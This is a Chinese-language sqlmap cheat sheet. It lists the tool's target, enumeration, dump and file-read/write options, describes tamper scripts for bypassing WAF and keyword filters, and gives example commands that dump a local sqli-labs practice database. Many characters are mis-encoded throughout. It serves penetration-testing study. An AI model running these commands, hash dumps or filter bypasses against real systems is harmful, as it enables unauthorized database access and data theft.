-d 		指定直接數(shù)據(jù)庫連接得連接字符串，直接連接到數(shù)據(jù)庫。
-u 		指定URL目標
-I 		從Burp或WebScarab代理得日志中解析目標
-m 		掃描文本文件中給出得多個目標，批量掃描
-r 		從文本中加載HTTP請求。 用 * 標記注入位置
-g 		將Google Dork得結果作為目標URLh

-a 				獲取所有信息
-current-user 	獲取DBMS當前用戶
--current-db  	獲取DBMS當前數(shù)據(jù)庫
--hostname 		獲取DBMS當前主機名
--is-dba 		檢測當前用戶是否為管理員用戶
--users 		查詢DBMS用戶
--passwords 	查詢DBMS用戶密碼hash
--dbs 			查詢DBMS數(shù)據(jù)庫
--tables 		查詢DBMS數(shù)據(jù)庫中得表
--columns 		查詢DBMS數(shù)據(jù)庫表得列名
--dump 			查詢轉儲DBMS數(shù)據(jù)庫表
--dump-all 		轉儲DBMS所有數(shù)據(jù)庫表
-D db_name 		指定要求枚舉的DBMS數(shù)據(jù)庫名
-T table_name 	指定要枚舉得DBMS表
-C column_name 	指定要枚舉得DBMS列
--batch 		從不詢問用戶輸入，使用所有默認配置

--data=DATA 			通過POST方式發(fā)送數(shù)據(jù)字符串
--cookie=COOKIE 		HTTP Cookie頭 LMXCMS演示
--user-agent=AGENT		指定HTTP User-Agent頭
--random-agent 		    使用隨機選定得HTTP User-Agent頭
--host=HOST 			指定HTTP HOST header
--referer=REFERER 		指定HTTP Referer header
--ignore-proxy 			忽略系統(tǒng)默認代理配置
--proxy=PROXY 			使用代理連接目標URL --proxy=" http://127.0.0.1:8080"
--delay=DELAY 			可以設定兩個請求間得延遲
--timeout=TIMEOUT 		可以設定一個請求超過多久判定為超時
--force-ssl 			強制使用SSL/HTTPS
--threads=THREADS 		HTTP（s）最大并發(fā)請求數(shù)（默認是1）
--dbms=DBMS 			強制指定后端DBMS
--os=OS 				強制指定后端得DBMS操作系統(tǒng)
--tamper 				使用給定得腳本修改注入數(shù)據(jù)

--level=LEVEL 	測試等級(1-5, default 1)
--risk=RISK 	測試的風險等級(1-3, default 1)
--technique 	來指定要使用哪種注入模式，快速掃描

--file-read=文件路徑 	從后端的數(shù)據(jù)庫管理系、統(tǒng)文件系統(tǒng)讀取文件
--file-write=文件路徑	編輯后端的數(shù)據(jù)庫管理系統(tǒng)、文件系統(tǒng)上的本地文件
--file-dest=文件路徑		后端的數(shù)據(jù)庫管理系統(tǒng)、寫入文件的絕對路徑

--tamper=base64encode.py
--tamper=test.py
space2comment.py 				用/**/代替空格
apostrophemask.py 				用utf8代替引號
equaltolike.py 					like代替等號
space2dash.py                   繞過過濾‘=' 替換空格字符（”），（'–‘）后跟一個破折號注釋，一個隨機字符串和一個新行（'n'）
greatest.py 					繞過過濾'>' ,用GREATEST替換大于號。
space2hash.py 					空格替換為#號,隨機字符串以及換行符
apostrophenullencode.py 	    繞過過濾雙引號，替換字符和雙引號。
halfversionedmorekeywords.py    當數(shù)據(jù)庫為mysql時繞過防火墻，每個關鍵字之前添加mysql版本評論
space2morehash.py 				空格替換為 #號 以及更多隨機字符串 換行符
appendnullbyte.py 				在有效負荷結束位置加載零字節(jié)字符編碼
ifnull2ifisnull.py 				繞過對IFNULL過濾,替換類似'IFNULL(A,B)'為'IF(ISNULL(A), B, A)'
space2mssqlblank.py 			(mssql)空格替換為其它空符號
base64encode.py 				用base64編碼替換
space2mssqlhash.py 				替換空格
modsecurityversioned.py 	    過濾空格，包含完整的查詢版本注釋
space2mysqlblank.py 			空格替換其它空白符號(mysql)
between.py						用between替換大于號（>）
space2mysqldash.py				替換空格字符（”）（' – ‘）后跟一個破折號注釋一個新行（' n'）
multiplespaces.py				圍繞SQL關鍵字添加多個空格
space2plus.py 					用+替換空格
bluecoat.py 					代替空格字符后與一個有效的隨機空白字符的SQL語句,然后替換=為like
nonrecursivereplacement.py      雙重查詢語句,取代SQL關鍵字
space2randomblank.py			代替空格字符（“”）從一個隨機的空白字符可選字符的有效集
sp_password.py					追加sp_password'從DBMS日志的自動模糊處理的有效載荷的末尾
chardoubleencode.py				雙url編碼(不處理以編碼的)
unionalltounion.py				替換UNION ALLSELECT UNION SELECT
charencode.py 					url編碼
randomcase.py					隨機大小寫
unmagicquotes.py				寬字符繞過 GPCaddslashes
randomcomments.py				用/**/分割sql關鍵字
charunicodeencode.py			字符串 unicode 編碼
securesphere.py					追加特制的字符串
versionedmorekeywords.py	    注釋繞過
space2comment.py				替換空格字符串(‘‘) 使用注釋‘/**/'
halfversionedmorekeywords.py    關鍵字前加注釋

python3 sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1"

python3 sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --is-dba

python3 sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --current-user

python3 sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --dbs

python3 sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --current-db

python3 sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D 數(shù)據(jù)庫名 --tables

python3 sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D 數(shù)據(jù)庫名 -T 表名 --columns

python3 sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D 數(shù)據(jù)庫名 -T 表名 --dump